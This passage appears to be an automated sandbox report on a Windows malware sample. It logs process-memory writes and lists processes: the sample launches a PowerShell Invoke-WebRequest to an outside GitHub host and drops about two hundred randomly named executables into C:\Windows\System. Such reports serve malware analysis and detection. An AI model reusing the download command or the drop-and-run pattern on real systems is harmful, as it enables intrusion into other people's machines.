PID 2912 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\PaynJdn.exe
PID 2912 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\PaynJdn.exe
PID 2912 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\PaynJdn.exe
PID 2912 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\SdICGhJ.exe
PID 2912 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\SdICGhJ.exe
PID 2912 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\SdICGhJ.exe
PID 2912 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\TWezKKv.exe
PID 2912 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\TWezKKv.exe
PID 2912 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\TWezKKv.exe
PID 2912 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\yTMbmAM.exe
PID 2912 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\yTMbmAM.exe
PID 2912 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\yTMbmAM.exe
PID 2912 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\HVBtvAf.exe
PID 2912 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\HVBtvAf.exe
PID 2912 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\HVBtvAf.exe
PID 2912 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\vhRvbkc.exe
PID 2912 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\vhRvbkc.exe
PID 2912 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\vhRvbkc.exe
PID 2912 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\NERXtYf.exe
PID 2912 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\NERXtYf.exe
PID 2912 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\NERXtYf.exe
PID 2912 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\SqEHUon.exe
PID 2912 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\SqEHUon.exe
PID 2912 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\SqEHUon.exe
PID 2912 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\AegArYW.exe
PID 2912 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\AegArYW.exe
PID 2912 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\AegArYW.exe
PID 2912 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\QZKhCcc.exe
PID 2912 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\QZKhCcc.exe
PID 2912 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\QZKhCcc.exe
PID 2912 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\OLRzWEJ.exe
PID 2912 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\OLRzWEJ.exe
PID 2912 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\OLRzWEJ.exe
PID 2912 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\juHPVoF.exe
PID 2912 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\juHPVoF.exe
PID 2912 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\juHPVoF.exe
PID 2912 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\GrfVFrC.exe
PID 2912 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\GrfVFrC.exe
PID 2912 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\GrfVFrC.exe
PID 2912 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\OGLDlvo.exe
PID 2912 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\OGLDlvo.exe
PID 2912 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\OGLDlvo.exe
PID 2912 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\EqcNSLS.exe
PID 2912 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\EqcNSLS.exe
PID 2912 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\EqcNSLS.exe
PID 2912 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\aKgPLFT.exe
PID 2912 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\aKgPLFT.exe
PID 2912 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\aKgPLFT.exe
PID 2912 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\sZTDrbb.exe
PID 2912 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\sZTDrbb.exe
PID 2912 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\sZTDrbb.exe
PID 2912 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\EHtKsrW.exe
PID 2912 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\EHtKsrW.exe
PID 2912 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\EHtKsrW.exe
PID 2912 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\xYvCgoF.exe
PID 2912 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\xYvCgoF.exe
PID 2912 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\xYvCgoF.exe
PID 2912 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\WsNJIml.exe
PID 2912 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\WsNJIml.exe
PID 2912 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\WsNJIml.exe
PID 2912 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\MdPNyVR.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\PaynJdn.exe

C:\Windows\System\PaynJdn.exe

C:\Windows\System\SdICGhJ.exe

C:\Windows\System\SdICGhJ.exe

C:\Windows\System\TWezKKv.exe

C:\Windows\System\TWezKKv.exe

C:\Windows\System\yTMbmAM.exe

C:\Windows\System\yTMbmAM.exe

C:\Windows\System\HVBtvAf.exe

C:\Windows\System\HVBtvAf.exe

C:\Windows\System\vhRvbkc.exe

C:\Windows\System\vhRvbkc.exe

C:\Windows\System\NERXtYf.exe

C:\Windows\System\NERXtYf.exe

C:\Windows\System\SqEHUon.exe

C:\Windows\System\SqEHUon.exe

C:\Windows\System\AegArYW.exe

C:\Windows\System\AegArYW.exe

C:\Windows\System\QZKhCcc.exe

C:\Windows\System\QZKhCcc.exe

C:\Windows\System\OLRzWEJ.exe

C:\Windows\System\OLRzWEJ.exe

C:\Windows\System\juHPVoF.exe

C:\Windows\System\juHPVoF.exe

C:\Windows\System\GrfVFrC.exe

C:\Windows\System\GrfVFrC.exe

C:\Windows\System\OGLDlvo.exe

C:\Windows\System\OGLDlvo.exe

C:\Windows\System\EqcNSLS.exe

C:\Windows\System\EqcNSLS.exe

C:\Windows\System\aKgPLFT.exe

C:\Windows\System\aKgPLFT.exe

C:\Windows\System\sZTDrbb.exe

C:\Windows\System\sZTDrbb.exe

C:\Windows\System\EHtKsrW.exe

C:\Windows\System\EHtKsrW.exe

C:\Windows\System\xYvCgoF.exe

C:\Windows\System\xYvCgoF.exe

C:\Windows\System\WsNJIml.exe

C:\Windows\System\WsNJIml.exe

C:\Windows\System\MdPNyVR.exe

C:\Windows\System\MdPNyVR.exe

C:\Windows\System\ZUrHLnP.exe

C:\Windows\System\ZUrHLnP.exe

C:\Windows\System\WwLPmpI.exe

C:\Windows\System\WwLPmpI.exe

C:\Windows\System\LBxIMBF.exe

C:\Windows\System\LBxIMBF.exe

C:\Windows\System\iUKmawF.exe

C:\Windows\System\iUKmawF.exe

C:\Windows\System\jxWTuiY.exe

C:\Windows\System\jxWTuiY.exe

C:\Windows\System\aGYMHNL.exe

C:\Windows\System\aGYMHNL.exe

C:\Windows\System\DblhNjB.exe

C:\Windows\System\DblhNjB.exe

C:\Windows\System\NjTtfFY.exe

C:\Windows\System\NjTtfFY.exe

C:\Windows\System\wXvWunI.exe

C:\Windows\System\wXvWunI.exe

C:\Windows\System\ZsYlaCb.exe

C:\Windows\System\ZsYlaCb.exe

C:\Windows\System\FueHtBZ.exe

C:\Windows\System\FueHtBZ.exe

C:\Windows\System\cDAqHsn.exe

C:\Windows\System\cDAqHsn.exe

C:\Windows\System\UYGvAJx.exe

C:\Windows\System\UYGvAJx.exe

C:\Windows\System\DVDQoZE.exe

C:\Windows\System\DVDQoZE.exe

C:\Windows\System\cTBNWnW.exe

C:\Windows\System\cTBNWnW.exe

C:\Windows\System\YEqcvaU.exe

C:\Windows\System\YEqcvaU.exe

C:\Windows\System\RaYxYxS.exe

C:\Windows\System\RaYxYxS.exe

C:\Windows\System\tuKjeQZ.exe

C:\Windows\System\tuKjeQZ.exe

C:\Windows\System\wzaeNyu.exe

C:\Windows\System\wzaeNyu.exe

C:\Windows\System\vJbmQWs.exe

C:\Windows\System\vJbmQWs.exe

C:\Windows\System\JzOUhid.exe

C:\Windows\System\JzOUhid.exe

C:\Windows\System\cZcQFrU.exe

C:\Windows\System\cZcQFrU.exe

C:\Windows\System\yTNRzeK.exe

C:\Windows\System\yTNRzeK.exe

C:\Windows\System\XCIrEBg.exe

C:\Windows\System\XCIrEBg.exe

C:\Windows\System\qmqaFpj.exe

C:\Windows\System\qmqaFpj.exe

C:\Windows\System\ZnzOPtg.exe

C:\Windows\System\ZnzOPtg.exe

C:\Windows\System\ijSjtHO.exe

C:\Windows\System\ijSjtHO.exe

C:\Windows\System\AjbPtyH.exe

C:\Windows\System\AjbPtyH.exe

C:\Windows\System\yNDebqN.exe

C:\Windows\System\yNDebqN.exe

C:\Windows\System\GVMfhMa.exe

C:\Windows\System\GVMfhMa.exe

C:\Windows\System\ItUldSZ.exe

C:\Windows\System\ItUldSZ.exe

C:\Windows\System\chfxXlx.exe

C:\Windows\System\chfxXlx.exe

C:\Windows\System\CtPeYtt.exe

C:\Windows\System\CtPeYtt.exe

C:\Windows\System\WAhvnoO.exe

C:\Windows\System\WAhvnoO.exe

C:\Windows\System\BejjybD.exe

C:\Windows\System\BejjybD.exe

C:\Windows\System\qXUdJyy.exe

C:\Windows\System\qXUdJyy.exe

C:\Windows\System\TPNShGD.exe

C:\Windows\System\TPNShGD.exe

C:\Windows\System\WpiINgU.exe

C:\Windows\System\WpiINgU.exe

C:\Windows\System\AUqdRGJ.exe

C:\Windows\System\AUqdRGJ.exe

C:\Windows\System\exhwDQq.exe

C:\Windows\System\exhwDQq.exe

C:\Windows\System\YRrUCbc.exe

C:\Windows\System\YRrUCbc.exe

C:\Windows\System\AZXPcvp.exe

C:\Windows\System\AZXPcvp.exe

C:\Windows\System\ekkEUcC.exe

C:\Windows\System\ekkEUcC.exe

C:\Windows\System\EiuIqIg.exe

C:\Windows\System\EiuIqIg.exe

C:\Windows\System\DzZbVCg.exe

C:\Windows\System\DzZbVCg.exe

C:\Windows\System\wxQNTqc.exe

C:\Windows\System\wxQNTqc.exe

C:\Windows\System\VrJOfHG.exe

C:\Windows\System\VrJOfHG.exe

C:\Windows\System\VKWNRVV.exe

C:\Windows\System\VKWNRVV.exe

C:\Windows\System\KrWnyft.exe

C:\Windows\System\KrWnyft.exe

C:\Windows\System\bvkJjUy.exe

C:\Windows\System\bvkJjUy.exe

C:\Windows\System\ZGvzHzL.exe

C:\Windows\System\ZGvzHzL.exe

C:\Windows\System\qVOMnak.exe

C:\Windows\System\qVOMnak.exe

C:\Windows\System\YnYItMv.exe

C:\Windows\System\YnYItMv.exe

C:\Windows\System\NAQTLpO.exe

C:\Windows\System\NAQTLpO.exe

C:\Windows\System\PfhbEcE.exe

C:\Windows\System\PfhbEcE.exe

C:\Windows\System\dxLaGhq.exe

C:\Windows\System\dxLaGhq.exe

C:\Windows\System\SPEFDdN.exe

C:\Windows\System\SPEFDdN.exe

C:\Windows\System\GfHEEVd.exe

C:\Windows\System\GfHEEVd.exe

C:\Windows\System\dNKYXnh.exe

C:\Windows\System\dNKYXnh.exe

C:\Windows\System\gTTVmMm.exe

C:\Windows\System\gTTVmMm.exe

C:\Windows\System\rPRlzNy.exe

C:\Windows\System\rPRlzNy.exe

C:\Windows\System\uERuwQe.exe

C:\Windows\System\uERuwQe.exe

C:\Windows\System\vHErpVk.exe

C:\Windows\System\vHErpVk.exe

C:\Windows\System\Kjxhora.exe

C:\Windows\System\Kjxhora.exe

C:\Windows\System\EUHssJL.exe

C:\Windows\System\EUHssJL.exe

C:\Windows\System\BiHfnUr.exe

C:\Windows\System\BiHfnUr.exe

C:\Windows\System\lHKubSO.exe

C:\Windows\System\lHKubSO.exe

C:\Windows\System\gOogFNW.exe

C:\Windows\System\gOogFNW.exe

C:\Windows\System\SZgEnyV.exe

C:\Windows\System\SZgEnyV.exe

C:\Windows\System\xGmSVlm.exe

C:\Windows\System\xGmSVlm.exe

C:\Windows\System\sigDnKj.exe

C:\Windows\System\sigDnKj.exe

C:\Windows\System\auaAYpF.exe

C:\Windows\System\auaAYpF.exe

C:\Windows\System\daptCQM.exe

C:\Windows\System\daptCQM.exe

C:\Windows\System\mjCpjCo.exe

C:\Windows\System\mjCpjCo.exe

C:\Windows\System\eGBkIsS.exe

C:\Windows\System\eGBkIsS.exe

C:\Windows\System\GgOCSgC.exe

C:\Windows\System\GgOCSgC.exe

C:\Windows\System\rDSUasv.exe

C:\Windows\System\rDSUasv.exe

C:\Windows\System\qqbNYIh.exe

C:\Windows\System\qqbNYIh.exe

C:\Windows\System\tTMYFDP.exe

C:\Windows\System\tTMYFDP.exe

C:\Windows\System\SRPJGkQ.exe

C:\Windows\System\SRPJGkQ.exe

C:\Windows\System\ahmldKd.exe

C:\Windows\System\ahmldKd.exe

C:\Windows\System\zgAWIgl.exe

C:\Windows\System\zgAWIgl.exe

C:\Windows\System\BlcvybV.exe

C:\Windows\System\BlcvybV.exe

C:\Windows\System\JjFXAFG.exe

C:\Windows\System\JjFXAFG.exe

C:\Windows\System\JBplOrC.exe

C:\Windows\System\JBplOrC.exe

C:\Windows\System\vuLKLIr.exe

C:\Windows\System\vuLKLIr.exe

C:\Windows\System\SyOfaWm.exe

C:\Windows\System\SyOfaWm.exe

C:\Windows\System\QxvZDCA.exe

C:\Windows\System\QxvZDCA.exe

C:\Windows\System\OiiNqDR.exe

C:\Windows\System\OiiNqDR.exe

C:\Windows\System\gJrsglN.exe

C:\Windows\System\gJrsglN.exe

C:\Windows\System\uWMPiyk.exe

C:\Windows\System\uWMPiyk.exe

C:\Windows\System\dtoIGok.exe

C:\Windows\System\dtoIGok.exe

C:\Windows\System\DrydpAN.exe

C:\Windows\System\DrydpAN.exe

C:\Windows\System\JiNkQDj.exe

C:\Windows\System\JiNkQDj.exe

C:\Windows\System\ugsCELf.exe

C:\Windows\System\ugsCELf.exe

C:\Windows\System\HTGfNcQ.exe

C:\Windows\System\HTGfNcQ.exe

C:\Windows\System\yZlisQf.exe

C:\Windows\System\yZlisQf.exe

C:\Windows\System\EpRgpbu.exe

C:\Windows\System\EpRgpbu.exe

C:\Windows\System\RSSJkPH.exe

C:\Windows\System\RSSJkPH.exe

C:\Windows\System\QUHZwnz.exe

C:\Windows\System\QUHZwnz.exe

C:\Windows\System\WnvxvqC.exe

C:\Windows\System\WnvxvqC.exe

C:\Windows\System\JRYRFNp.exe

C:\Windows\System\JRYRFNp.exe

C:\Windows\System\IVMxMxQ.exe

C:\Windows\System\IVMxMxQ.exe

C:\Windows\System\lyaOHCe.exe

C:\Windows\System\lyaOHCe.exe

C:\Windows\System\fvkFWcV.exe

C:\Windows\System\fvkFWcV.exe

C:\Windows\System\zALOjtg.exe

C:\Windows\System\zALOjtg.exe

C:\Windows\System\GgPbQQB.exe

C:\Windows\System\GgPbQQB.exe

C:\Windows\System\yjqcnil.exe

C:\Windows\System\yjqcnil.exe

C:\Windows\System\kpkKKHT.exe

C:\Windows\System\kpkKKHT.exe

C:\Windows\System\RMfWuXB.exe

C:\Windows\System\RMfWuXB.exe

C:\Windows\System\HUhNwVG.exe

C:\Windows\System\HUhNwVG.exe

C:\Windows\System\rTAJJoZ.exe

C:\Windows\System\rTAJJoZ.exe

C:\Windows\System\kDxOuyv.exe

C:\Windows\System\kDxOuyv.exe

C:\Windows\System\okSWVAD.exe

C:\Windows\System\okSWVAD.exe

C:\Windows\System\QWHwjTW.exe

C:\Windows\System\QWHwjTW.exe

C:\Windows\System\nqXvbQu.exe

C:\Windows\System\nqXvbQu.exe

C:\Windows\System\osAvihO.exe

C:\Windows\System\osAvihO.exe

C:\Windows\System\ZMPUhgT.exe

C:\Windows\System\ZMPUhgT.exe

C:\Windows\System\OJSSQck.exe

C:\Windows\System\OJSSQck.exe

C:\Windows\System\oOVocom.exe

C:\Windows\System\oOVocom.exe

C:\Windows\System\xaUmMjj.exe

C:\Windows\System\xaUmMjj.exe

C:\Windows\System\uhQOjPY.exe

C:\Windows\System\uhQOjPY.exe

C:\Windows\System\UwYuhjZ.exe

C:\Windows\System\UwYuhjZ.exe

C:\Windows\System\zGPJOga.exe

C:\Windows\System\zGPJOga.exe

C:\Windows\System\TOiMpRZ.exe

C:\Windows\System\TOiMpRZ.exe

C:\Windows\System\nLATqBt.exe

C:\Windows\System\nLATqBt.exe

C:\Windows\System\OAhESog.exe

C:\Windows\System\OAhESog.exe

C:\Windows\System\BVtJTDH.exe

C:\Windows\System\BVtJTDH.exe

C:\Windows\System\xprrKin.exe

C:\Windows\System\xprrKin.exe

C:\Windows\System\ONmVAvz.exe

C:\Windows\System\ONmVAvz.exe

C:\Windows\System\ypwgYNx.exe

C:\Windows\System\ypwgYNx.exe

C:\Windows\System\BpucEGA.exe

C:\Windows\System\BpucEGA.exe

C:\Windows\System\lqLWFvG.exe

C:\Windows\System\lqLWFvG.exe

C:\Windows\System\PdoxhPR.exe

C:\Windows\System\PdoxhPR.exe

C:\Windows\System\bedTapv.exe

C:\Windows\System\bedTapv.exe

C:\Windows\System\jxOjjrd.exe

C:\Windows\System\jxOjjrd.exe

C:\Windows\System\kvasSoC.exe

C:\Windows\System\kvasSoC.exe

C:\Windows\System\KyLPwFa.exe

C:\Windows\System\KyLPwFa.exe

C:\Windows\System\iuBWGly.exe

C:\Windows\System\iuBWGly.exe

C:\Windows\System\mbEtqVe.exe

C:\Windows\System\mbEtqVe.exe

C:\Windows\System\DnrrGsl.exe

C:\Windows\System\DnrrGsl.exe

C:\Windows\System\lPsQzEu.exe

C:\Windows\System\lPsQzEu.exe

C:\Windows\System\PRpFoQC.exe

C:\Windows\System\PRpFoQC.exe

C:\Windows\System\kdyojAW.exe

C:\Windows\System\kdyojAW.exe

C:\Windows\System\BhjTbnW.exe

C:\Windows\System\BhjTbnW.exe

C:\Windows\System\OUKxKsa.exe

C:\Windows\System\OUKxKsa.exe

C:\Windows\System\zKecdqA.exe

C:\Windows\System\zKecdqA.exe

C:\Windows\System\wTNnAWR.exe

C:\Windows\System\wTNnAWR.exe

C:\Windows\System\FKtXoui.exe

C:\Windows\System\FKtXoui.exe

C:\Windows\System\DanJfkh.exe

C:\Windows\System\DanJfkh.exe

C:\Windows\System\vfDfJJj.exe

C:\Windows\System\vfDfJJj.exe

C:\Windows\System\loXzhrT.exe

C:\Windows\System\loXzhrT.exe

C:\Windows\System\DjuXHZQ.exe

C:\Windows\System\DjuXHZQ.exe

C:\Windows\System\VsiJtMj.exe

C:\Windows\System\VsiJtMj.exe

C:\Windows\System\RtbPVaS.exe

C:\Windows\System\RtbPVaS.exe

C:\Windows\System\NdtgAKX.exe

C:\Windows\System\NdtgAKX.exe

C:\Windows\System\ZFVpCun.exe

C:\Windows\System\ZFVpCun.exe

C:\Windows\System\wLvZhLy.exe

C:\Windows\System\wLvZhLy.exe

C:\Windows\System\iaryrDF.exe

C:\Windows\System\iaryrDF.exe

C:\Windows\System\ixaBKxm.exe

C:\Windows\System\ixaBKxm.exe

C:\Windows\System\VkuFDnm.exe

C:\Windows\System\VkuFDnm.exe

C:\Windows\System\orHDGSC.exe

C:\Windows\System\orHDGSC.exe

C:\Windows\System\EZrPYgj.exe

C:\Windows\System\EZrPYgj.exe

C:\Windows\System\smYqskZ.exe

C:\Windows\System\smYqskZ.exe

C:\Windows\System\JQyNjEQ.exe

C:\Windows\System\JQyNjEQ.exe

C:\Windows\System\PEniesJ.exe

C:\Windows\System\PEniesJ.exe

C:\Windows\System\yVemqDk.exe

C:\Windows\System\yVemqDk.exe

C:\Windows\System\kfEGZvK.exe

C:\Windows\System\kfEGZvK.exe

C:\Windows\System\NalZeNn.exe

C:\Windows\System\NalZeNn.exe

C:\Windows\System\klqoOjl.exe

C:\Windows\System\klqoOjl.exe

C:\Windows\System\jwvAuav.exe

C:\Windows\System\jwvAuav.exe

C:\Windows\System\YSECtYE.exe

C:\Windows\System\YSECtYE.exe

C:\Windows\System\WqwMCvM.exe

C:\Windows\System\WqwMCvM.exe

C:\Windows\System\inXdHGi.exe

C:\Windows\System\inXdHGi.exe

C:\Windows\System\WfwRxnn.exe

C:\Windows\System\WfwRxnn.exe

C:\Windows\System\dkkeTYR.exe

C:\Windows\System\dkkeTYR.exe

C:\Windows\System\kYIvdZq.exe

C:\Windows\System\kYIvdZq.exe

C:\Windows\System\anfSgAF.exe

C:\Windows\System\anfSgAF.exe

C:\Windows\System\QVdaltL.exe

C:\Windows\System\QVdaltL.exe

C:\Windows\System\BNXQLaO.exe

C:\Windows\System\BNXQLaO.exe

C:\Windows\System\AlcsCVg.exe

C:\Windows\System\AlcsCVg.exe

C:\Windows\System\sYvhiMr.exe

C:\Windows\System\sYvhiMr.exe

C:\Windows\System\KteHvry.exe

C:\Windows\System\KteHvry.exe

C:\Windows\System\bWDPtgo.exe

C:\Windows\System\bWDPtgo.exe

C:\Windows\System\tGMNNUu.exe

C:\Windows\System\tGMNNUu.exe

C:\Windows\System\YRNamMJ.exe

C:\Windows\System\YRNamMJ.exe

C:\Windows\System\kHsdhMt.exe

C:\Windows\System\kHsdhMt.exe

C:\Windows\System\bCRUpAr.exe

C:\Windows\System\bCRUpAr.exe

C:\Windows\System\WmkQlzw.exe

C:\Windows\System\WmkQlzw.exe

C:\Windows\System\wadtZJg.exe

C:\Windows\System\wadtZJg.exe

